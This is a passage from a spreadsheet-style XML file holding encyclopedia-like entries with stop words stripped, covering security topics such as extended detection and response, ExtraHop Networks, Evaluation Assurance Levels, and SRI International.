    <t>magda lilia chelly (born 1983) polish-tunisian cybersecurity expert amongst first tunisian woman advisory board blackhat asia executive committee. born krakow, poland, educated tunisia france, chelly worked consultant, university lecturer, business leader, cybersecurity professional.in 2016, chelly established cybersecurity start-up singapore, asia. founding member women cyber, non-profit diversity group. chelly long history involvement diversity inclusion activism launched first catch flag competition girls singapore support cyber security agency singapore. early life chelly born krakow, town south poland, 1983. following father's advice importance getting engineering degree, chelly completed degree master telecommunication engineering moving france. there, chelly completed field telecom sudparis, évry, france. never returned live poland tunisia. career chelly worked several organizations cybersecurity advisor. 2022, chelly gave popular talk titled "why alienated cybersecurity topics" addresses challenges cybersecurity awareness. research chelly's research career started working indoor positioning within telecom sudparis. later expanded research cybersecurity. amongst scientific papers are: techniques indoor positioning, combining deterministic estimation methods wifi hybridisation pseudolites repeaters indoor positioning purposes social media impact education: social media home educationshe reviewers annals telecommunications annales télécommunications volume pages 129–131, publisher springer 2009. books chelly co-author, tran shamane tan, book computer security author science fiction book: (2022) building cyber resilient business (2021) light, shadow, cyber: vera's cyber adventures media chelly featured cybersecurity expert dark documentary channel news asia. she, later featured shows, including news; first channel launched september 1970. filmography chelly known early days appearance love original title: aime-moi (2009); short movie armelle deutsch: toute mort devant (2009), love (2009), utopium: song artist (2008). quotes "cybersecurity social responsibility." awards recognition chelly received various awards, across career, including below: ifsec global influencers security fire 2021 also indoor positioning system wi-fi positioning system social media education references external links media related magda lilia chelly wikimedia commons official website {{google scholar id|fcfgzmaaaaaj} ماجدة شيلى</t>
  </si>
  <si>
    <t>Extended detection and response</t>
  </si>
  <si>
    <t>extended detection response (xdr) cybersecurity technology monitors mitigates cyber security threats. concept term coined palo alto networks 2018.the system works collecting correlating data across various network points servers, email, cloud workloads, endpoints. data analyzed correlated, lending visibility context, revealing advanced threats. thereafter, threats prioritized, analyzed, sorted prevent security collapses data loss. system helps organizations higher level cyber awareness, enabling cyber security teams identify eliminate security vulnerabilities.the improves malware detection antivirus capabilities endpoint detection response (edr) system. improves capabilities deploy high-grade security solutions utilizing current technologies proactively identifies collects security threats, employs strategies detect future cyber security threats. alternative reactive endpoint protection solutions, network traffic analysis (nta). also endpoint security data loss prevention software endpoint detection response references</t>
  </si>
  <si>
    <t>Extensible Configuration Checklist Description Format</t>
  </si>
  <si>
    <t>extensible configuration checklist description format (xccdf) format specifying security checklists, benchmarks configuration documentation. xccdf development pursued nist, nsa, mitre corporation, department homeland security. xccdf intended serve replacement security hardening analysis documentation written prose. xccdf used security content automation protocol. references external links xccdf homepage xccdf 1.1.2 specification xccdf 1.1.3 specification xccdf 1.1.4 specification xccdf specification (current october 2011)</t>
  </si>
  <si>
    <t>ExtraHop Networks</t>
  </si>
  <si>
    <t>extrahop cybersecurity company providing ai-based network intelligence stops advanced threats across cloud, hybrid, distributed environments. history jesse rothstein raja mukerji founded extrahop 2007 seattle, washington, usa. co-founders formerly senior engineers networks architects big-ip product. early extrahop acquired $6.6 million funding madrona venture group private investors including marc andreessen horowitz. 2014, company closed million series round technology crossover ventures (tcv). other participants round included existing investors meritech capital partners madrona venture group, well private investors including sujal patel, former founder isilon systems. this round brought extrahop’s total venture funding $61.6 million.in december 2014, company appointed john matthews chief information officer. july 2016, extrahop brought arif kareem, former president fluke networks division fluke corporation, co-founder jesse rothstein moving role. january 2017, bryce hein joined company marketing (promoted 2020), june 2017, chris lehman appointed worldwide sales (promoted 2020). 2019, bill ruckelshaus joined company cfo.after debuting visionary gartner magic quadrant network performance monitoring diagnostics 2017, 2018 extrahop formally expanded cyber security market release reveal(x) product, followed years later launch saas-based reveal(x) 360. january 2019, company announced booked $100 million revenue previous year.in july 2021, extrahop acquired bain capital private equity crosspoint capital partners $900 million. company's announcement here. february 2022, company announced appointed patrick dennis following retirement arif kareem. announcement also highlighted growth metrics company, including growth annual recurring revenue (arr), year-over-year growth customer acquisition, rapid adoption reveal(x) saas offering. march, company also announced craig weimer cro.extrahop operates globally offices seattle, washington (hq); london, germany; france; australia; singapore; japan. products extrahop sells products enterprise security operations cases. company launched reveal(x) network intelligence product security operations teams 2018. 2020, company introduced reveal(x) 360, fully saas-based version network detection response platform. reveal(x) reveal(x) (hereinafter referred "reveal(x)") company calls "cloud-scale machine learning" (ml) algorithms rule-based techniques detect behaviors, anomalies, software vulnerabilities provide security recommendations actionable detection cards, curate threat intelligence indicators compromise known threats. reveal(x) securely decrypts analyzes traffic real time, collect intelligence network threat telemetry drive detections. these include: –detection encrypted lateral movement, living land, encrypted exploit attempts cves printnightmare, proxylogon, log4shell, spring4shell.–detection cloud attack techniques (eg, imds proxying, services enumeration) –hygiene detections (eg, insecure protocols, passwords plaintext) –iot detections (abnormal behavior observed device specific make model) –network-based detection abuse encrypted microsoft protocols (active directory, kerberos, smbv3, msrpc), well –user behavior (eg, abnormal login behavior) extrahop reveal(x) works extracting metadata network traffic across protocols, including ability decrypt microsoft application authentication protocols transport_layer_security#tls_1.3. this data includes natively discovered information endpoints/users mac, hostname, software, application layer information, usernames, geolocation, passive dns, whois. reveal(x) data enriched threat intelligence endpoint process data partner products. extrahop detections include timeline related events, mitre att&amp;ck techniques, next steps investigation remediation, 1-click access forensic data transaction records decrypted packets. these data also explored/filtered starting point threat hunts. customers build, reuse, share libraries saved queries speed recurring threat hunting tasks. core extrahop technology passive network appliance uses network port mirroring receive network traffic, performs full-stream reassembly extract application-level protocol metrics custom-specified information contained transaction payload. subset metrics sent cloud used machine learning features proactively detect anomalous behavior could indicate data breaches, ransomware, threats well performance issues.the extrahop network sensors deployed self-managed physical virtual appliances, zero-infrastructure saas product. network sensors deployed on-premises data centers, campus, remote sites, cloud environments including amazon services (aws), microsoft azure ,and google cloud platform (gcp). integrations extrahop reveal(x) natively integrates number technology products, including endpoint security (crowdstrike), threat intelligence, saas/iaas/paas platforms microsoft native telemetry.a sample list known integrations includes: crowdstrike; microsoft defender security center; windows defender atp; microsoft 365; quarantine; azure sentinel; cisco ise; palo alto ngfw, panorama, demisto; splunk siem phantom; exabeam; qradar; servicenow; check point. certifications extrahop holds number industry certifications. these include type gdpr, hipaa privacy shield. customers known extrahop customers include ulta beauty, home depot, city dallas. company leadership patrick dennis, chief executive officer; jesse rothstein, co-founder chief technology officer; raja mukerji, co-founder chief customer officer; bill ruckelshaus, chief financial officer; craig weimer, chief revenue officer; bryce hein, chief marketing officer; john matthews, chief information officer; o'brien, general counsel; jackie haggerty, vice president human resources funding july 2021, bain capital private equity crosspoint capital partners acquired extrahop $900m, marking significant shift market away prevention-and-protection model toward detection-and-response approach. after extensive diligence market research, bain crosspoint determined network detection response (ndr) poised next major cybersecurity category, segment already growing fast cagr. both parties agreed, extrahop provides best-in-class team best-in-class product market entered agreement acquire extrahop june 2021. prior acquisition, extrahop’s last funding 2014, $41m series round brought total funding $61m. company's series $14m round closed 2011, preceded $5.1m series april 2009. unlike many technology companies exit comparable valuations, extrahop raised limited capital largely self-funded. references</t>
  </si>
  <si>
    <t>Extranet</t>
  </si>
  <si>
    <t>extranet controlled private network allows access partners, vendors suppliers authorized customers normally subset information accessible organization's intranet. extranet similar provides access needed services authorized parties, without granting access organization's entire network. historically, term occasionally also used sense organizations sharing internal networks virtual private network (vpn). enterprise applications during late 1990s early 2000s, several industries started term 'extranet' describe centralized repositories shared data (and supporting applications) made accessible authorized members particular work groups example, geographically dispersed, multi-company project teams. some applications offered software service (saas) basis. example, construction industry, project teams access project extranet share drawings, photographs documents, online applications mark-up make comments manage report project-related communications. 2003 united kingdom, several leading vendors formed network construction collaboration technology providers (ncctp) promote technologies establish data exchange standards different data systems. type construction-focused technologies also developed united states, australia mainland europe. advantages exchange large volumes data using electronic data interchange (edi) share product catalogs exclusively trade partners collaborate companies joint development efforts jointly develop training programs companies provide access services provided company group companies, online banking application managed company behalf affiliated banks improved efficiency: since customers satisfied information provided advantage organization customers increases efficiency. disadvantages extranets expensive implement maintain within organization (e.g., hardware, software, employee training costs), hosted internally rather application service provider. security extranets concern hosting valuable proprietary information. also list collaborative software wide area network references further reading</t>
  </si>
  <si>
    <t>Extrusion detection</t>
  </si>
  <si>
    <t>extrusion detection outbound intrusion detection branch intrusion detection aimed developing mechanisms identify successful unsuccessful attempts resources computer system compromise systems. extrusion detection techniques focus primarily analysis system activity outbound traffic order detect malicious users, malware network traffic pose threat security neighboring systems. while intrusion detection mostly concerned identification incoming attacks (intrusion attempts), extrusion detection systems prevent attacks launched first place. they implement monitoring controls leaf nodes network—rather concentrating choke points, e.g., routers—in order distribute inspection workload take advantage visibility system state. ultimate goal extrusion detection identify attack attempts launched already compromised system order prevent reaching target, hereby containing impact threat. external links "stopping spam extrusion detection" "outbound intrusion detection"</t>
  </si>
  <si>
    <t>Exit control lock</t>
  </si>
  <si>
    <t>exit control lock, also known exit control device, exit lock, simply exit control, prevents deters unauthorized exit. typical uses exit control locks often used retail establishments deter shoplifting. they also used airports controlled areas, people held clear customs quarantine stations. exit control locks also used libraries, well-staffed entrance exit, number exits intended emergency only. exit control devices often used hospitals, interfaced wireless sensors worn newborn children, exits lock baby stolen hospital rooms. shops often, shops make exit emergency deter shoplifting. usually, door locked emergency exit button next pushing emergency exit button unlock door shop's fire alarm off. this deters shoplifting person unlocks door order take item building emergency reported police, cctv footage available. benefits locking door shoplifters deterred using exit would attract unwanted attention. reduces requirements security guards security technology (e.g. cctv, electronic article surveillance gates). benefits locking door increased footfall: multiple exits lead people walking shop, therefore shop's products advertised them, shortcut. psychological evidence shows customers feel less relaxed welcomed signs saying allowed something emergency. they also feel frustrated look another exit. exit control designs many exit control locks based magnetic locks. type, delayed egress magnetic locks, allow door open immediately. this allows guard door door opens. also release fire alarm power failure, otherwise locks hold exit doors shut. these units common alzheimer units. exit control systems include "request exit detector" pushbutton opens exit exit requests enabled. facilities, entrances well exits require authentication swiping otherwise reading card card reader. intruder slips entrance controls building, able detained questioning. references</t>
  </si>
  <si>
    <t>Eye in the sky (camera)</t>
  </si>
  <si>
    <t>term given casino commercial security closed circuit cameras. casinos, positioned monitor seats, tables, hallways, restaurants, even elevators closely. functional component known pan–tilt–zoom camera, ptz, industry standard term. camera covered semi-transparent plastic globe makes nearly impossible direction camera facing distance. retail stores often install empty globes, giving appearance additional cameras. camera mounted series interconnected gears levers, usually allow axes rotation. this rotation either controlled manually operator using remote-control, automated using motion sensing technology. commercial civilian applications, control methods used simultaneously allow automated surveillance general movement allowing manual over-ride mode view specific subjects closely. these cameras often help casino officials judge whether person card counting, popular blackjack, past posting, roulette. case crime cheat detected fact, casino employees review recorded tapes find culprit. casino cameras adjusted focus certain suspicious players security workers separate casino room banks security monitors.these types cameras also found retail stores well monitor customers employees, walmart target. they also fool robbers thinking camera watching monitored cctv. also casino security closed-circuit television panopticon references</t>
  </si>
  <si>
    <t>Evaluation Assurance Level</t>
  </si>
  <si>
    <t>evaluation assurance level (eal1 eal7) product system numerical grade assigned following completion common criteria security evaluation, international standard effect since 1999. increasing assurance levels reflect added assurance requirements must achieve common criteria certification. intent higher levels provide higher confidence system's principal security features reliably implemented. level measure security system itself, simply states level system tested. achieve particular eal, computer system must meet specific assurance requirements. most requirements involve design documentation, design analysis, functional testing, penetration testing. higher eals involve detailed documentation, analysis, testing lower ones. achieving higher certification generally costs money takes time achieving lower one. number assigned certified system indicates system completed requirements level. although every product system must fulfill assurance requirements achieve particular level, fulfill functional requirements. functional features certified product established security target document tailored product's evaluation. therefore, product higher necessarily "more secure" particular application lower eal, since different lists functional features security targets. product's fitness particular security application depends well features listed product's security target fulfill application's security requirements. security targets products contain necessary security features, higher indicate trustworthy product application. assurance levels eal1: functionally tested eal1 applicable confidence correct operation required, threats security viewed serious. value independent assurance required support contention care exercised respect protection personal similar information. eal1 provides evaluation (target evaluation) made available customer, including independent testing specification, examination guidance documentation provided. intended eal1 evaluation could successfully conducted without assistance developer toe, minimal cost. evaluation level provide evidence functions manner consistent documentation, provides useful protection identified threats. eal2: structurally tested eal2 requires cooperation developer terms delivery design information test results, demand effort part developer consistent good commercial practice. require substantially increased investment cost time. eal2 therefore applicable circumstances developers users require moderate level independently assured security absence ready availability complete development record. such situation arise securing legacy systems. eal3: methodically tested checked eal3 permits conscientious developer gain maximum assurance positive security engineering design stage without substantial alteration existing sound development practices. eal3 applicable circumstances developers users require moderate level independently assured security, require thorough investigation development without substantial re-engineering. eal4: methodically designed, tested reviewed eal4 permits developer gain maximum assurance positive security engineering based good commercial development practices which, though rigorous, require substantial specialist knowledge, skills, resources. eal4 highest level likely economically feasible retrofit existing product line. eal4 therefore applicable circumstances developers users require moderate high level independently assured security conventional commodity toes prepared incur additional security-specific engineering costs. commercial operating systems provide conventional, user-based security features typically evaluated eal4. examples operating systems aix, hp-ux, oracle linux, netware, solaris, suse linux enterprise server suse linux enterprise server enterprise linux windows 2000 service pack windows 2003, windows windows vista,windows windows server 2008 z/os version z/vm version 6.3.operating systems provide multilevel security evaluated minimum eal4. examples include trusted solaris, solaris release 11/06 trusted extensions, early version xts-400, vmware esxi version 4.1, 3.5, 4.0, 4.3, aix7, suse linux enterprise server (eal 4+). vsphere update achieve eal4+ level eal2+ certified june 2015. eal5: semiformally designed tested eal5 permits developer gain maximum assurance security engineering based upon rigorous commercial development practices supported moderate application specialist security engineering techniques. such probably designed developed intent achieving eal5 assurance. likely additional costs attributable eal5 requirements, relative rigorous development without application specialized techniques, large. eal5 therefore applicable circumstances developers users require high level independently assured security planned development require rigorous development approach without incurring unreasonable costs attributable specialist security engineering techniques. numerous smart card devices evaluated eal5, multilevel secure devices tenix interactive link. xts-400 (stop general-purpose operating system evaluated eal5 augmented. lpar system eal5 certified. eal6: semiformally verified design tested eal6 permits developers gain high assurance application security engineering techniques rigorous development environment order produce premium protecting high-value assets significant risks. eal6 therefore applicable development security toes application high risk situations value protected assets justifies additional costs. green hills software's integrity-178b rtos certified eal6 augmented. eal7: formally verified design tested eal7 applicable development security toes application extremely high risk situations and/or high value assets justifies higher costs. practical application eal7 currently limited toes tightly focused security functionality amenable extensive formal analysis. tenix interactive link data diode device fox-it data diode (one-way data communications device) claimed evaluated eal7 augmented (eal7+). implications assurance levels technically speaking, higher means nothing more, less, evaluation completed stringent quality assurance requirements. often assumed system achieves higher provide security features reliably (and required third-party analysis testing performed security experts reasonable evidence direction), little published evidence support assumption. impact cost schedule 2006, government accountability office published report common criteria evaluations summarized range costs schedules reported evaluations performed levels eal2 eal4. late 1990s, vendors reported spending us$1 million even us$2.5 million evaluations comparable eal4. there published reports cost various microsoft windows security evaluations. augmentation requirements cases, evaluation augmented include assurance requirements beyond minimum required particular eal. officially indicated following number word augmented usually list codes indicate additional requirements. shorthand, vendors often simply "plus" sign eal4+) indicate augmented requirements. notation common criteria standards denote eals shown article: prefix "eal" concatenated digit (examples: eal1, eal3, eal5). practice, countries place space prefix digit (eal plus sign indicate augmentation informal shorthand used product vendors (eal4+ 4+). references external links (march 2006). "information assurance: national partnership offers benefits, faces considerable challenges" (pdf). report gao-06-392. united states government accountability office. retrieved 2006-07-10. {{cite journal}}: cite journal requires |journal= (help)smith, richard (october 2000). "trends government endorsed security product evaluations" (pdf). proc. 20th national information systems security conference. archived original (pdf) 2006-10-01. retrieved 2006-07-10. ccevs validated products list common criteria assurance level information iacs cisco common criteria certifications operating system certifications microsoft windows common criteria certification suse linux awarded government security cert xts-400 information understanding windows eal4 evaluation charu chaubal (february 2007). "security design vmware infrastructure architecture" (pdf). 20070215 item: wp-013-prd-01-01. vmware, inc. retrieved 2008-11-19. {{cite journal}}: cite journal requires |journal= (help)</t>
  </si>
  <si>
    <t>European Programme for Critical Infrastructure Protection</t>
  </si>
  <si>
    <t>european programme critical infrastructure protection (epcip) refers doctrine programmes created identify protect critical infrastructure that, case fault, incident attack, could seriously impact country hosted least european member state. history epcip came result consultation 2004 european council, seeking programme protect critical infrastructure 'communication critical infrastructure protection fight terrorism'. december 2004 endorsed intention european commission propose european programme critical infrastructure protection (epcip) agreed creation european critical infrastructure warning information network (ciwin). december european commission issued finalised design directive com(2006) 786; obliged member states adopt components epcip national statutes. apply main area european union also wider european economic area. epcip also identified national critical infrastructure (nci) disruption would affect single member state. responsibility protecting items owner/operators relevant member state, encouraged member state establish national programme. references com(2006) communication commission european programme critical infrastructure protection council 2008/114/ec council directive 2008/114/ec december 2008 identification designation european critical infrastructures assessment need improve protection</t>
  </si>
  <si>
    <t>Ericom Software</t>
  </si>
  <si>
    <t>ericom software, inc. closter, jersey-based company provides isolation remote application access software businesses. overview ericom develops sells remote browser isolation technology, available cloud service on-premises software. company also sells broad line secure access products connects users enterprise applications windows environments. more recently, launched secure access service edge (sase) platform called ztedge includes network security capabilities like cloud-based firewall, gateway, cloud security controls, well remote browser isolation.ericom promoting concept zero trust browsing, positioning isolation technology safely browse internet, prevent phishing attacks, stop credential theft.ericom blaze also available desktop protocol (rdp) acceleration compression technology display content (wide area network), high latency connections networks limited bandwidth. solution accelerates sessions accessed vmware view connection broker.ericom accessnow deployed schools enable student faculty access windows applications desktops google chromebooks. ericom also html5 clients vmware view quest vworkspace, accessnow vmware view accessnow vworkspace, running wholly within browser, enable seamless access quest vworkspace vmware view virtual desktops. history ericom software founded 1993 initially developed terminal emulation (ibm 5250, 3270) products; later expanding offer software server-based computing, vdi, web-to-host connectivity secure browsing.in november, 2007 ericom delivered first terminal services client certified microsoft windows server 2008.ericom accessnow line html5 remote desktop protocol (rdp) clients provide browser-based access windows applications desktops running microsoft rds/terminal services platforms devices supporting html5-compliant browser, including google chromebooks.ericom connect remote desktop application virtualization tool. ericom shield remote browser isolation solution protects data security.in january 2019, david canellos joined company president ceo. said interview planned focus integrations technologies vendors. april 2019, company announced nick kael joined chief technology officer. kael cyber-security veteran held senior leadership positions zscaler, symantec, qwest. february 2020, company announced john peterson joined chief product officer. chase cunningham joined ericom forrester research chief strategy officer january 2021. references</t>
  </si>
  <si>
    <t>SRI International</t>
  </si>
  <si>
    <t>international (sri) american nonprofit scientific research institute organization headquartered menlo park, california. trustees stanford university established 1946 center innovation support economic development region. organization founded stanford research institute. formally separated stanford university 1970 became known international 1977. performs client-sponsored research development government agencies, commercial businesses, private foundations. also licenses technologies, forms strategic partnerships, sells products, creates spin-off companies. sri's headquarters located near stanford university campus. sri's annual revenue 2014 approximately $540 million, tripled 1998 leadership curtis carlson. 1998, organization verge bankruptcy carlson took ceo. over next sixteen years carlson ceo, organizational culture transformed. tripled size, became profitable, created many world-changing innovations, using nabc framework. best-known success—siri, personal assistant iphone—came company created sold apple. william jeffrey served sri's president since september 2014. employs 2,100 people. sarnoff corporation, wholly owned subsidiary since 1988, fully integrated january 2011.sri's focus areas include biomedical sciences, chemistry materials, computing, earth space systems, economic development, education learning, energy environmental technology, security national defense, well sensing devices. received 4,000 patents patent applications worldwide. history foundation 1920s, stanford university professor robert swain proposed creating research institute western united states. herbert hoover, trustee stanford university, also early proponent institute became less involved project elected president united states. development institute delayed great depression 1930s world 1940s, three separate attempts leading formation 1946. august 1945, maurice nelles, morlan visel, ernest black lockheed made first attempt create institute formation "pacific research foundation" angeles. second attempt made henry heald, president illinois institute technology. 1945, heald wrote report recommending research institute west coast close association stanford university initial grant $500,000 (equivalent $5,805,000 2020). third attempt made fred terman, stanford university's dean engineering. terman's proposal followed heald's, focused faculty student research contract research.the trustees stanford university voted create organization 1946. structured goals aligned charter university—to advance scientific knowledge benefit public large, students stanford university. trustees named corporation's general members, elected sri's directors (later known presidents); organization dissolved, assets would return stanford university.research chemist william talbot became first director institute. stanford university president donald tresidder instructed talbot avoid work would conflict interests university, particularly federal contracts might attract political pressure. drive find work lack support stanford faculty caused research institute violate directive months later pursuit contract office naval research. this issues, including frustration tresidder's micromanagement organization, caused talbot repeatedly offer resignation, tresidder eventually accepted. talbot replaced jesse hobson, previously armour research foundation, pursuit contract work remained. early history sri's first research project investigated whether guayule plant could used source natural rubber. during world rubber imported u.s. subject shortages strict rationing. from 1942 1946, united states department agriculture (usda) supported project create domestic source natural rubber. once ended, united states congress funding program; response, office naval research created grant project continue sri, usda staff project worked congress reauthorized funding 1947.sri's first economic study united states force. 1947, force wanted determine expansion potential u.s. aircraft industry; found would take long escalate production emergency. 1948, began research consultation chevron corporation develop artificial substitute tallow coconut soap production; sri's investigation confirmed potential dodecylbenzene suitable replacement. later, procter gamble used substance basis tide laundry detergent.the institute performed much early research pollution formation ozone lower atmosphere. sponsored first national pollution symposium pasadena, california, november 1949. experts gave presentations pollution research, exchanged ideas techniques, stimulated interest field. event attended scientists, business executives, civic leaders u.s. co-sponsored subsequent events subject. april 1953, walt disney hired (and particular, harrison price) consult proposal establishing amusement park burbank, california. provided information location, attendance patterns, economic feasibility. selected larger site anaheim, prepared reports operation, provided on-site administrative support disneyland acted advisory role park expanded. 1955, commissioned select site provide design suggestions john kennedy center performing arts.in 1952, technicolor corporation contracted develop near-instantaneous, electro-optical alternative manual process timing film copying. 1959, academy motion picture arts sciences presented scientific engineering award jointly technicolor work design development technicolor electronic printing timer greatly benefited motion picture industry. 1954, southern pacific asked investigate ways reducing damage rail freight shipments mitigating shock railroad cars. this investigation william maccurdy's development hydra-cushion technology, remains standard today.in 1950s, worked direction bank america develop erma (electronic recording machine, accounting) magnetic character recognition (micr). erma project computer scientist jerre noe, time sri's assistant director engineering. 2011, micr remains industry standard automated check processing. rapid expansion douglas engelbart, founder sri's augmentation research center (arc), primary force behind design development multi-user on-line system nls), featuring original versions modern computer-human interface elements including bit-mapped displays, collaboration software, hypertext, precursors graphical user interface computer mouse. pioneer human-computer interaction, engelbart arguably sri's notable alumnus. awarded national medal technology innovation 2000.bill english, chief engineer arc, built first prototype computer mouse engelbart's design 1964. also developed inkjet printing (1961) optical disc recording (1963). liquid-crystal display (lcd) technology developed laboratories 1960s, later became sarnoff corporation 1988, wholly owned subsidiary sri. sarnoff fully integrated 2011.in early 1960s, hewitt crane colleagues developed world's first all-magnetic digital computer, based upon extensions magnetic core memories. technology licensed inc., used build specialized computers controlling tracks york city subway railroad switching yards.in 1966, sri's artificial intelligence center began working "shakey robot", first mobile robot reason actions. equipped television camera, triangulating rangefinder, bump sensors, shakey used software perception, world-modeling, acting. project ended 1972. sri's artificial intelligence center marked 45th anniversary 2011. october 1969, first connection wide area network packet switching, arpanet, established nodes leonard kleinrock's laboratory university california, angeles (ucla) douglas engelbart's laboratory using interface message processors sites. following year, engelbart's laboratory installed first tenex system outside developed. addition ucla, university california, santa barbara university utah part original four network nodes. december 1969, entire four-node network connected. 1970s, developed packet-switched radio precursor wireless networking), over-the-horizon radar, deafnet, vacuum microelectronics, software-implemented fault tolerance. first true internet transmission occurred november 1977, originated first connection three disparate networks. data flowed seamlessly mobile packet radio menlo park, california university southern california angeles university college london, england, across three types networks: packet radio, satellite, arpanet. 2007, computer history museum presented 30th anniversary celebration demonstration, included several participants 1977 event. would network information center leadership jake feinler. split diversification vietnam (1955–1975) important issue college campuses across united states 1960s 1970s. belated response vietnam protesters believed funding defense advanced research projects agency (darpa) made university part military–industrial complex, stanford research institute split stanford university 1970. organization subsequently changed name stanford research institute international 1977. 1972, physicists harold puthoff russell targ undertook series investigations psychic phenomena sponsored cia, coined term remote viewing. among activities, project encompassed work consulting "consciousness researchers" including artist/writer ingo swann, military intelligence officer joseph mcmoneagle, psychic/illusionist geller. this work continued funding intelligence community puthoff targ left mid-1980s. information, parapsychology research sri. social scientist consumer futurist arnold mitchell created values, attitudes lifestyles (vals) psychographic methodology late 1970s explain changing u.s. values lifestyles. vals formally inaugurated product 1978 called "one market research breakthroughs 1980s" advertising magazine.throughout 1980s, developed zylon, stealth technologies, improvements ultrasound imaging, two-dimensional laser fluorescence imaging, many-sorted logic. computing software, developed multimedia electronic mail system, theory non-interference computer security, multilevel secure (mls) relational database system called seaview, latex, open agent architecture (oaa), network intrusion detection system, maude system, declarative software language, packethop, peer-to-peer wireless technology create scalable networks. sri's research network intrusion detection patent infringement case international, inc. internet security systems, inc. center's robotics research shakey's successor, flakey robot, focused fuzzy logic.in 1986, sri.com became registered ".com" domain. artificial intelligence center developed procedural reasoning system (prs) late 1980s early 1990s. launched field bdi-based intelligent agents. 1990s, developed letter sorting system united states postal service several education economic studies.military-related technologies developed 1990s 2000s include ground- foliage-penetrating radar, incon redde command control system u.s. military, igrs (integrated radio system)—an advanced military personnel vehicle tracking system. train armored combat units battle exercises, developed deployable force-on-force instrumented range system (dfirst), uses satellites, high-speed wireless communications, digital terrain displays.sri created centibots 2003, first largest teams coordinated, autonomous mobile robots explore, map, survey unknown environments. also created bothunter, free utility unix, detects botnet activity within network. with darpa-funded research, contributed development speech recognition translation products active participant darpa's global autonomous language exploitation (gale) program. developed dynaspeak speech recognition technology used handheld voxtec phraselator, allowing u.s. soldiers overseas communicate local citizens near real time. also created translation software iraqcomm, device allows two-way, speech-to-speech machine translation english colloquial iraqi arabic.in medicine chemistry, developed dry-powder drugs, laser photocoagulation treatment maladies), remote surgery (also known telerobotic surgery), bio-agent detection using upconverting phosphor technology, experimental anticancer drugs tirapazamine tas-108, ammonium dinitramide environmentally benign oxidizer safe cost-effective disposal hazardous materials), electroactive polymer ("artificial muscle"), uses diamagnetic levitation, antimalarial drug halofantrine.sri performed study 1990s whirlpool corporation modern self-cleaning ovens. 2000s, worked pathway tools software bioinformatics systems biology accelerate drug discovery using artificial intelligence symbolic computing techniques. software system generates biocyc database collection, sri's growing collection genomic databases used biologists visualize genes within chromosome, complete biochemical pathways, full metabolic maps organisms. early 21st century researchers made first observation visible light emitted oxygen atoms night-side airglow venus, offering insight planet's atmosphere. education researchers conducted first national evaluation growing u.s. charter schools movement. world golf foundation, compiled first-ever estimate overall scope u.s. golf industry's goods services ($62 billion 2000), providing framework monitoring long-term growth industry. april 2000, formed atomic tangerine, independent consulting firm designed bring technologies services market. 2006, awarded $56.9 million contract national institute allergy infectious diseases provide preclinical services development drugs antibodies anti-infective treatments avian influenza, sars, west nile virus hepatitis. also 2006, selected petersburg, florida, site marine technology research facility targeted ocean science, maritime industry port security; facility collaboration university south florida college marine science center ocean technology. that facility created method underwater mass spectrometry, used conduct "advanced underwater chemical surveys exploration production, ocean resource monitoring protection, water treatment management" licensed spyglass technologies march 2014.in december 2007, launched spin-off company, siri inc., apple acquired april 2010. october 2011, apple announced siri personal assistant integrated feature apple iphone siri's technology born sri's work darpa-funded calo project, described largest artificial intelligence project ever launched. siri co-founded december 2007 kittlaus (ceo), adam cheyer (vice president, engineering), gruber (cto/vice president, design), together norman winarsky (vice president ventures). investors included menlo ventures morgenthaler ventures.for national science foundation (nsf), operates advanced modular incoherent scatter radar (amisr), novel relocatable atmospheric research facility. other sri-operated research facilities include arecibo observatory puerto rico sondrestrom upper atmospheric research facility greenland. 2011, awarded million contract operate arecibo observatory october 2011, september 2016. institute also manages creek radio observatory northern california, home allen telescope array.in february 2014, announced "photonics-based testing technology called fastcell" detection characterization rare circulating tumor cells blood samples. test aimed cancer-specific biomarkers breast, lung, prostate, colorectal leukemia cancers circulate blood stream minute quantities, potentially diagnosing conditions earlier.in september 2018, announced international rewarded $4.4 million establish backbone organization national network. description employees financials february 2015, employs approximately 2,100 people. 2014, $540 million revenue. 2013, united states department defense consisted awards value; remainder composed national institutes health (11%); businesses industry (8%); united states agencies (6%); national science foundation (6%); united states department education (4%); foundations (2%).as february 2015, approximately 4,000 patents granted international employees. facilities primarily based 63-acre (0.25 km2; 0.10 campus located menlo park, california, considered part silicon valley. this campus encompasses 1,300,000 square feet (120,000 office space. addition, 254-acre (1.028 km2; 0.397 campus princeton, jersey, 600,000 square feet (56,000 research space. there also offices washington, d.c., tokyo, japan. total, 2,300,000 square feet (210,000 office laboratory space. organization international organized seven units (generally referred divisions) focus specific subject areas. staff members alumni chief executive form since establishment. prior split stanford university, position known director; split, known company's president ceo. nine far, including william talbot (1946–1947), jesse hobson (1947–1955), finley carter (1956–1963), charles anderson (1968–1979), william miller (1979–1990), james tietjen (1990–1993), william sommers (1993–1998) curtis carlson (1998–2014). more recently, role split two. current william jeffrey (2014–present) president manish kothari (formerly president ventures). also board directors since inception, served guide provide opportunities organization. current board directors includes samuel armacost (chairman board emeritus), mariann byerwalter (chairman), william jeffrey, charles holloway (vice chairman), vern clark, robert joss, leslie kenne, henry kressel, david liddle, philip quigley, wendell wierenga john young jr.its notable researchers include elmer robinson (meteorologist), co-author 1968 report american petroleum institute (api) risks fossil fuel burning global climate. many notable researchers involved augmentation research center. these include douglas engelbart, developer modern gui; william english, inventor mouse; jeff rulifson, primary developer nls; elizabeth feinler, network information center; david maynard, would help found electronic arts.the artificial intelligence center also produced large number notable alumni, many contributed shakey robot; include project manager charles rosen, well nils nilsson, bertram raphael, richard duda, peter hart, richard fikes, richard waldinger. researcher gary hendrix went found symantec. former yahoo! president marissa mayer performed research internship center 1990s. calo project (and spin-off, siri) also produced notable names including raymond perrault adam cheyer.several projects produced notable researchers engineers long computing mainstream. early employee paul cook founded raychem. william maccurdy developed hydra-cushion freight southern pacific 1954; hewitt crane jerre instrumental development electronic recording machine, accounting; harrison price helped walt disney company design disneyland; james bliss developed optacon; robert weitbrecht invented first telecommunications device deaf. spin-off companies working investment venture capital firms, former employees launched spin-off ventures wide range fields, including siri (acquired apple), tempo (acquired salesforce.com), redwood robotics (acquired google), desti (acquired here), grabit, kasisto, artificial muscle, inc. (acquired bayer materialscience), nuance communications, intuitive surgical, ravenswood solutions, orchid cellmark.former staff members also established companies. engineering analysis, example, notable companies formed alumni include weitbrecht communications, exponent raychem. companies area legal, policy business analysis include fair isaac corporation, global business network institute future.research computing computer science-related areas development many companies, including symantec, australian artificial intelligence institute, e-trade, verbatim corporation. wireless technologies spawned firetide venture capital firm envia partners. health systems research inspired telesensory systems. also francisco area portal references notes works cited nielson, donald (2006). heritage innovation: sri's first half century. menlo park, 